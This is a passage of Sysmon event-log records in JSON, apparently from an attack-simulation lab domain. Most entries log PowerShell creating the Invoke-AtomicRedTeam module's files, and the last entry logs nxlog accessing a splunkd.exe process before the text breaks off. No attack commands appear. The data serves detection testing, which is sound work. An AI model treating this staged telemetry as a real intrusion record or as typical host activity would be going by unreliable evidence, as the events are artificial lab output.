{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5104,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.460\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-CheckPrereqs.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.460","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.460","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-CheckPrereqs.ps1","CreationUtcTime":"2020-08-01 06:55:03.460","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5105,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.460\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-ExecuteCommand.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.460","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.460","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-ExecuteCommand.ps1","CreationUtcTime":"2020-08-01 06:55:03.460","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5106,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.460\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-KillProcessTree.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.460","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.460","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-KillProcessTree.ps1","CreationUtcTime":"2020-08-01 06:55:03.460","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5107,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.460\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-Process.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.460","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.460","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-Process.ps1","CreationUtcTime":"2020-08-01 06:55:03.460","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5108,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.460\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Replace-InputArgs.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.460","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.460","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Replace-InputArgs.ps1","CreationUtcTime":"2020-08-01 06:55:03.460","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5109,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.460\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Show-Details.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.460","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.460","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Show-Details.ps1","CreationUtcTime":"2020-08-01 06:55:03.460","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5110,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.460\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-ExecutionLog.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.460","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.460","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-ExecutionLog.ps1","CreationUtcTime":"2020-08-01 06:55:03.460","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5111,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.475\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-KeyValue.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.475","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.475","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-KeyValue.ps1","CreationUtcTime":"2020-08-01 06:55:03.475","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5112,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.475\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-PrereqResults.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.475","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.475","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-PrereqResults.ps1","CreationUtcTime":"2020-08-01 06:55:03.475","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5113,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.475\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Get-AtomicTechnique.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.475","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.475","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Get-AtomicTechnique.ps1","CreationUtcTime":"2020-08-01 06:55:03.475","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5114,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.475\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-AtomicTest.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.475","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.475","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-AtomicTest.ps1","CreationUtcTime":"2020-08-01 06:55:03.475","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5115,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.475\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-MalDoc.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.475","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.475","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-MalDoc.ps1","CreationUtcTime":"2020-08-01 06:55:03.475","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5116,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.475\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-WebRequestVerifyHash.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.475","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.475","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-WebRequestVerifyHash.ps1","CreationUtcTime":"2020-08-01 06:55:03.475","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5117,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.475\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\New-Atomic.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.475","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.475","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\New-Atomic.ps1","CreationUtcTime":"2020-08-01 06:55:03.475","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5118,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.475\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Start-AtomicGUI.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.475","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.475","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Start-AtomicGUI.ps1","CreationUtcTime":"2020-08-01 06:55:03.475","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5119,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.491\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicredteam.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.491","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.491","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicredteam.ps1","CreationUtcTime":"2020-08-01 06:55:03.491","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5120,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.491\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicsfolder.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.491","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.491","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicsfolder.ps1","CreationUtcTime":"2020-08-01 06:55:03.491","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5121,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.522\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.522","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files 